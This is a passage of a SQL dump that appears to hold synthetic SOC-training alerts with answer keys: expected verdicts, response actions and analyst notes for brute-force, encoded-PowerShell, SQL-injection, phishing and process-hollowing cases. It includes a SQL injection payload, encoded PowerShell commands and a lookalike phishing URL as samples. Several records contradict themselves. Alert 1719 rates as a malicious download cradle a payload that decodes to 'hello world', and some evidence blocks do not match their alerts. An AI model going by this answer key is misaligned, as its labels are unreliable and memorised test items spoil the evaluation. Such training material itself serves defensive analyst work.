hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.055Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\",\\\"command_line\\\":\\\"explorer.exe hollowed_process.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1713, 'Failed Brute Force Attempt from Foreign IP', 'medium', 'Carbon Black', 'A series of failed login attempts from an unusual foreign IP has been detected, suggesting a possible brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:15:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.42\",\"dst_ip\":\"\",\"username\":\"admin\",\"hostname\":\"SERVER-01\",\"failed_attempts\":25}', '2026-03-15 19:48:17', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported multiple times for brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted admin account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated login failures from a known malicious IP suggest a brute force attempt against the admin account.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:57:16.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 
port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:56:16.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:55:16.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:54:16.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1714, 'PowerShell Activity from Internal Network Detected', 'low', 'Sysmon', 'An internal IP executed a PowerShell command with encoded data. This might be a benign administrative script.', 'Malware', 'T1059.001', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"\",\"username\":\"jsmith\",\"hostname\":\"SERVER-03\",\"command_line\":\"powershell.exe -EncodedCommand ZWNobyAnSGVsbG8gV29ybGQn\"}', '2026-03-15 19:48:17', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand ZWNobyAnSGVsbG8gV29ybGQn\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Base64 payload decodes to a plain echo of the text Hello World, a harmless test command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoding alone is not evidence of malice, since legitimate administration tooling routinely uses -EncodedCommand. The alert is cleared because decoding the payload yields a plain echo of the text Hello World on an internal host; always decode the payload before closing an encoded-PowerShell alert.\"}', 'Intermediate', 'EDR', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.059Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"SERVER-03\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand 
ZWNobyAnSGVsbG8gV29ybGQn\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.059Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"SERVER-03\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnSGVsbG8gV29ybGQn\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.059Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"SERVER-03\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnSGVsbG8gV29ybGQn\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.059Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"SERVER-03\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnSGVsbG8gV29ybGQn\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.059Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"SERVER-03\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnSGVsbG8gV29ybGQn\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1715, 'SQL Injection Attempt Detected on Web Server', 'high', 'CrowdStrike', 'A SQL injection attempt was identified targeting the corporate web server from an external IP.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:55:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.122\",\"dst_ip\":\"192.168.1.20\",\"username\":\"\",\"hostname\":\"WEB-SERVER\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-03-15 19:48:17', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.122\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple SQL injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal web server address\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The signature of the attempted SQL injection matches known attack patterns, confirming the threat.\"}', 'Intermediate', 'EDR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1716, 'Potential Phishing Email with Malicious URL', 'medium', 'Sysmon', 'A suspicious email containing a potentially malicious URL was detected, mimicking a trusted domain.', 'Phishing', 'T1566.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T13:10:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.114.5\",\"dst_ip\":\"192.168.1.30\",\"username\":\"kthompson\",\"hostname\":\"EMAIL-SERVER\",\"email_sender\":\"noreply@trusted.com\",\"url\":\"http://trusted.com.secure-login.co\"}', '2026-03-15 19:48:17', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"noreply@trusted.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Sender address uses the legitimate trusted.com domain itself; the From header is trivially forgeable, so treat it as spoofed unless the SPF, DKIM and DMARC results for this message pass\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://trusted.com.secure-login.co\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL part of phishing campaign; the registrable domain is secure-login.co and trusted.com is only a leading subdomain label chosen to look like the real site\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.114.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for hosting phishing sites\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The URL and sender analysis confirm a phishing attempt aiming to deceive recipients into entering credentials.\"}', 'Intermediate', 'EDR', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:10:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.114.5\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"kthompson\\\",\\\"hostname\\\":\\\"EMAIL-SERVER\\\",\\\"email_sender\\\":\\\"noreply@trusted.com\\\",\\\"url\\\":\\\"http://trusted.com.secure-login.co\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:10:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.114.5\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"kthompson\\\",\\\"hostname\\\":\\\"EMAIL-SERVER\\\",\\\"email_sender\\\":\\\"noreply@trusted.com\\\",\\\"url\\\":\\\"http://trusted.com.secure-login.co\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:10:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.114.5\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"kthompson\\\",\\\"hostname\\\":\\\"EMAIL-SERVER\\\",\\\"email_sender\\\":\\\"noreply@trusted.com\\\",\\\"url\\\":\\\"http://trusted.com.secure-login.co\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:10:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.114.5\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"kthompson\\\",\\\"hostname\\\":\\\"EMAIL-SERVER\\\",\\\"email_sender\\\":\\\"noreply@trusted.com\\\",\\\"url\\\":\\\"http://trusted.com.secure-login.co\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:10:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.114.5\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"kthompson\\\",\\\"hostname\\\":\\\"EMAIL-SERVER\\\",\\\"email_sender\\\":\\\"noreply@trusted.com\\\",\\\"url\\\":\\\"http://trusted.com.secure-login.co\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1717, 'Benign Internal PowerShell Script Execution', 'low', 'Carbon Black', 'A PowerShell script was executed on an internal machine. The activity appears to be a routine system administration task.', 'Malware', 'T1059.001', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T10:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.55\",\"dst_ip\":\"\",\"username\":\"admin\",\"hostname\":\"DC-01\",\"command_line\":\"powershell.exe -EncodedCommand ZWNobyAnU3lzdGVtIEFkbWluaXN0cmF0aW9uIFRhc2sn\"}', '2026-03-15 19:48:17', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal company IP address\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand ZWNobyAnU3lzdGVtIEFkbWluaXN0cmF0aW9uIFRhc2sn\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Commonly used PowerShell command for administration\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell script execution matches typical system administration patterns and does not indicate malicious activity.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand 
ZWNobyAnU3lzdGVtIEFkbWluaXN0cmF0aW9uIFRhc2sn\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnU3lzdGVtIEFkbWluaXN0cmF0aW9uIFRhc2sn\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnU3lzdGVtIEFkbWluaXN0cmF0aW9uIFRhc2sn\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnU3lzdGVtIEFkbWluaXN0cmF0aW9uIFRhc2sn\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnU3lzdGVtIEFkbWluaXN0cmF0aW9uIFRhc2sn\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1718, 'Process Hollowing Activity Detected in benign_app.exe', 'medium', 'SentinelOne', 'Process hollowing detected within benign_app.exe. Initial investigation suggests this is part of legitimate software behavior.', 'Malware', 'T1055.012', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T15:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.75\",\"dst_ip\":\"\",\"username\":\"user1\",\"hostname\":\"DESKTOP-05\",\"command_line\":\"benign_app.exe hollowed_process.exe\"}', '2026-03-15 19:48:17', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"hollowed_process.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Filename recognized as part of a legitimate application suite; confirm by file hash and code signature, since a filename match alone is not a reputation result\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"benign_app.exe hollowed_process.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Process behavior consistent with legitimate software update mechanism\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process behavior aligns with known legitimate applications, suggesting a false positive. Because malware routinely reuses legitimate filenames, confirm before closing that the hash and code signature of hollowed_process.exe and of the parent benign_app.exe match the vendor-published binaries, and reopen the alert if either is unsigned or unknown.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.75\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"DESKTOP-05\\\",\\\"command_line\\\":\\\"benign_app.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.75\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"DESKTOP-05\\\",\\\"command_line\\\":\\\"benign_app.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.75\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"DESKTOP-05\\\",\\\"command_line\\\":\\\"benign_app.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.75\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"DESKTOP-05\\\",\\\"command_line\\\":\\\"benign_app.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.75\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"DESKTOP-05\\\",\\\"command_line\\\":\\\"benign_app.exe hollowed_process.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1719, 'PowerShell Download Cradle Execution Detected', 'critical', 'CrowdStrike', 'A PowerShell script was executed on host FIN-SRV01, downloading an encoded script indicative of a potential malware attack.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T03:45:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"FIN-SRV01\",\"request_body\":\"\",\"command_line\":\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\"}', '2026-03-15 19:48:49', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command execution detected\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell is not conclusive on its own, since legitimate administration tooling also uses -EncodedCommand; the true-positive verdict rests on the EDR reporting download-cradle behaviour from this process on the finance server FIN-SRV01. Decode the payload and preserve the retrieved script and the outbound connection details as part of forensics before the host is rebuilt.\"}', 'Intermediate', 'EDR', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 